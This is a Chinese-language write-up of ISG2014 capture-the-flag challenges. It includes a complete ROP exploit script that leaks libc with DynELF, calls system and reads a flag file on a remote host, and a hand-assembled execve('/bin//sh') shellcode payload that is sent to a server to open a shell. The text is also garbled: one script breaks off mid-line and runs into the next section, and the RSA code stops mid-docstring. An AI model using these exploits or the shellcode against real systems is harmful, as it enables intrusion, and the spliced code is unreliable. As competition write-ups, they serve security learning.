ISG2014 Writeups

所有文件打包下载：ISG.zip

Smile Web 200


php 源代码审计

图片：2014101109351673887.png

Cryptobaby Crypto 100


按照程序逻辑,把 0x403018 处的数据按 131 进制分开成字符即可。

Pwnme Exploit 300


漏洞为很明显的栈溢出,但没有提供 libc,需要自行获取 libc 中的函数地址。

在这里我们使用 pwntools 来获取 system 的地址,把参数写在 data 段并最终执行。

执行 system 时有很奇怪的偏移问题这里稍微调整了一下最后执行 system gadget 在栈上的位置。

#!python
#!/usr/bin/env python2
from zio import *
from pwn import *
@MemLeak
def leak_write(addr): io.read_until('Pwn me if you can:n') payload = 'A' * 24 + l64(poprdi) + l64(1) + l64(poprsi) + l64(addr) + junk +
l64(write_plt) + l64(main) io.write(payload.ljust(0x100, 'A')) ret = io.read(256) return ret
target = './pwnme'
target = ('202.120.7.69', 34343)
poprdi = 0x400663
poprsi = 0x400661 # pop rsi; pop r15; ret ret = 0x400664
write_got = 0x601018
write_plt = 0x400480
main = 0x4005bd
junk = 'J' * 8
data = 0x601040
read_plt = 0x4004a0
io = zio(target, print_read=False, print_write=False, timeout=100000)
elf = DynELF('./pwnme', leak_write)
system = elf.lookup('system')
log.success('system: %s' % hex(system))
io.read_until('Pwn me if you can:n')
payload = 'A' * 24 + l64(poprdi) + l64(0) + l64(poprsi) + l64(data) + junk + l64(read_plt) + l64(poprdi) + l64(data) + l64(ret) * 5 + l64(system)
io.write(payload.ljust(0x100, 'A'))
io.write('cat /home/pwnme/flag'.ljust(0x100, 'A'))
io.interact()

SQLMAP Misc 100


题目提供了 sqlmap 运行时的流量,按照 SQL 语句及执行结果推断每个字节即可。

#!python
#!/usr/bin/env python2
import sys, re
def remove(idx, sign, value): sub = xrange(0, value) if sign == ' '/bin//sh'):
#a: 99 cltd
#b: 89 de mov %ebx,%esi
#d: 53 push %rbx
#e: 55 push %rbp
#f: 48 89 e7 mov %rsp,%rdi
#12: 6a 3b pushq $0x3b
#14: 58 pop %rax
#15: 0f 05 syscall
call_rax = 0x40070d
shellcode = '9989de53554889e76a3b580f05'.decode('hex') + 'x90' + '/bin//sh'
host = '202.120.7.73'
port = 44445
io = zio((host, port))
payload = shellcode + l64(call_rax)[:6]
io.write(payload)
io.interact()

GIF Misc 50


GIF 第二帧为一二维码,内容即为 flag。

丫丫 Crypto 400


流量中包含了 7 组公钥和密文。考虑到 e=3,使用 Håstad's Broadcast Attack 方法,可使用中国剩余定理对原文求解。发现 7 组原文并不完全相同,从中枚举 3 个尝试解密最终获得 flag。


#!python
#!/usr/bin/env python2
from operator import mod, mul, sub, add
import re, os, collections, sys
import fractions
import itertools
def eea(a,b): """Extended Euclidean Algorithm for GCD""" v1 = [a,1,0] v2 = [b,0,1] while v2[0]0: p = v1[0]//v2[0] # floor division v2, v1 = map(sub,v1,[p*vi for vi in v2]), v2 return v1
def inverse(m,k): """ Return b such that b*m mod k = 1, or 0 if no solution """ v = eea(m,k) return (v[0]==1)*(v[1] % k)
def crt(ms, _as): """ Chinese Remainder Theorem: ms = list of pairwise relatively prime integers as = remainders when x is divided by ms (ai is 'each in as', mi 'each in ms') The solution for x modulo M (M = product of ms) will be: x = a1*M1*y1 + a2*M2*y2 + ... + ar*Mr*yr (mod M), where Mi = M/mi and yi = (Mi)^-1 (mod mi) for 1